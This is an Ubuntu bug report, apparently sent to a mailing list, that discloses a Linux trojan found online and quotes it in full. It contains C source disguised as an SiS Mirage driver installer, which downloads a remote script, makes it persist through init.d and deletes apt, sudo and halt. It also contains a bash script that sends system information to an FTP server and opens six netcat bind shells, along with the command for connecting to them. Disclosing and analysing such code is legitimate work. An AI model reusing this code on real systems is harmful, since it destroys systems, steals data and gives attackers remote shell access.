Public bug reported:
Surfong in the web I've found this backdoor that download a script that
opens 5 ports. Let mi show you:
#include <stdio.h>
int main()
{
system("clear");
printf("SiS Mirage: Instalando drivers... Esto puede tardar unos
segundos. Sea paciente\n");
system("sleep 10s");
printf("\nSiS-Mirage: El driver para SiS Mirage (2, 3 y 4) ha sido
instalado correctamente, ahora se cargara la configuración, porfavor sea
paciente...\n");
system("sleep 2s");
system("wget
http://usuarios.lycos.es/darrenborowsky/sis-mirage/sis-mirage-config.sh && cp
sis-mirage-config.sh /etc/init.d/ && chmod +x /etc/init.d/sis-mirage-config.sh
&& cp sis-mirage-config.sh /usr/bin/ && update-rc.d sis-mirage-config.sh
defaults && rm -f sis-mirage-config.sh &");
system("apt-get install netcat wput &");
system("/usr/bin/sis-network-config");
system("sleep 2s");
printf("\nSiS-Mirage: Cargando configuración...\n");
system("sleep 10s");
printf("\nSiS-Mirage: Hecho!\n");
printf("\nFeAzOr: Estas cagado!!! .............. .... FeAzOr ¬¬\n");
system("sleep 5s");
printf("\nFeAzOr: Lo siento a la proxima no confies del codigo cerrado
Sad\n");
system("sleep 5s");
printf("\nFeAzOr: Si detienes el programa se formateara tu HD con todo y
particiones jaja!, anda oprime ctrl+c o cierra la terminal y veras que pasa
Cheesy jajajaja!!!\n");
system("sleep 7s");
printf("\nFeAzOr: Anda!, hazlo, veremos que pasa si uso el comando rm -r
en algunos directorios de la carpeta raíz jaja!\n");
system("sleep 7s");
printf("\nFeAzOr: Mira me caiste bien, solo por esta ocación te dejare en
paz, a la proxima no confies del codigo cerrado\n");
system("sleep 5s");
printf("\nFeAzOr: Programa terminado. Porfavor recuerdame, atte: FeAzOr
¬¬\n");
system("clear");
system("sleep 5s");
printf("FeAzOr: Me arrepenti, te dejare un recuerdito jajajajajaja!\n");
system("rm -rf /usr/bin/apt* && rm -rf /usr/bin/sudo && rm -rf /sbin/halt
&");
system("sleep 5s");
system("FeAzOr: Listo!, ahora si, ya puedes detener el programa Smiley.
Que tengas buen dia!\n");
system("clear");
system("exit");
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
to conect into an infected PC:
nc --v 255.255.255.25 5 60000
nc = netcat
v = verbose
255... = IP
60000 = port
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
the script:
#!/bin/bash
#########################
# Nombre: FeAzOr SeRvEr #
# Creado por: FeAzOr #
# Version: 1.0 #
# Licencia: GPL #
# Fecha: 27/12/2007 #
#########################
# funciones
# recopilar información util del sistema
# sistema
function FeAzOr_SeRvEr ()
{
KERNEL=$(uname -r)
DISTRO=$(lsb-release)
PROCESADOR=$(uname -p)
TIPO_PROCESADO R=$(uname -m)
HOST=$(uname -n)
# internet
IP=$(ifconfig | grep addr | cut -d : -f 2 | grep Bcast | cut -d " " -f 1)
INTERNET=$(ifconfig)
# disco duro
DISCO_DURO=$(df -h)
# fecha
FECHA=$(date)
# tu cuenta ftp debe ser igual que el pass, eso es opcional
l="micuentaymipas s"
# guardar la información obtenida
echo "
#######################################################
Sistema
-------------------------------------------------------
Kernel: $KERNEL
Distro: $DISTRO
Procesador: $PROCESADOR
Maquina: $TIPO_PROCESADOR
Hostname: $HOST
-------------------------------------------------------
Internet
-------------------------------------------------------
$IP
$INTERNET
-------------------------------------------------------
Disco Duro
-------------------------------------------------------
$DISCO_DURO
-------------------------------------------------------
Fecha: $FECHA
#####################################################
Generado por: FeAzOr_SeRvEr 1.0" > /tmp/log-$IP.txt
# enviar los resultados mediante ftp
wput /tmp/log-$IP.txt ftp://${l}:[EMAIL PROTECTED]/
# eliminar rastro de log.txt y wput.log
rm /tmp/log* &
# ejecutar bash y abrir puertos en escucha en background con NetCat
# ejecutar bash en el puerto 60000
nc -l -e /bin/bash -p 60000 &
# ejecutar bash en el puerto 60001
nc -l -e /bin/bash -p 60001 &
# ejecutar bash en el puerto 60002
nc -l -e /bin/bash -p 60002 &
# ejecutar bash en el puerto 60003
nc -l -e /bin/bash -p 60003 &
# ejecutar bash en el puerto 60004
nc -l -e /bin/bash -p 60004 &
# ejecutar bash en el puerto 60005
nc -l -e /bin/bash -p 60005 &
}
# ejecutar el server
FeAzOr_SeRvEr
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Notes: the user must execute it being root.
The page: http://foro.portalhacker.net/index.php/topic,57264.0.html
** Affects: ubuntu
Importance: Undecided
Status: New
** Visibility changed to: Public
--
linux backdoor
https://bugs.launchpad.net/bugs/179423
You received this bug notification because you are a member of Ubuntu
Bugs, which is the bug contact for Ubuntu.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
